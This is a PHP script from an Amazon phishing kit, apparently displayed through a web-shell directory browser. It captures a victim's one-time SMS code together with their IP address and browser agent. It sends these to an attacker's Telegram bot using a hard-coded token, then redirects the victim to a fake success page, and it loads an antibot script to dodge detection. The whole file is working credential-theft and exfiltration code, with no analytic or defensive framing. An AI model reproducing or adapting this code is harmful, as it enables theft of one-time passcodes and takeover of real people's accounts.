%PDF- %PDF-
| Direktori : /home/gachan/www/bannera5ycws/get2/www.amazon.com/ap/ |
| Current File : /home/gachan/www/bannera5ycws/get2/www.amazon.com/ap/send-sms2.php |
<?php
require './script/antibot.php';
require './script/antibot.php';
require './script/antibot.php';
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$message .= "-------------------AMAZON--otp2-------------------------------\n";
$message .= "otp2 : ".$_POST['sms']."\n";
$message .= "------------------------IP-----------------------------\n";
$message .= "From : ".$ip."\n";
$message .= "Agent : ".$userAgent."\n";
$message .= "-----------------------------------------------------\n";
$website="https://api.telegram.org/bot7415045422:AAHuhkri94WTWonM0NGrxY9HY5jz_rePQ0A";
$chatId=-4266187998; //Receiver Chat Id
$params=[
'chat_id'=>'-4266187998',
'text'=>$message,
'parse_mode'=>'html'
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
sleep(5);
header("Location: sucsefly.php");
?>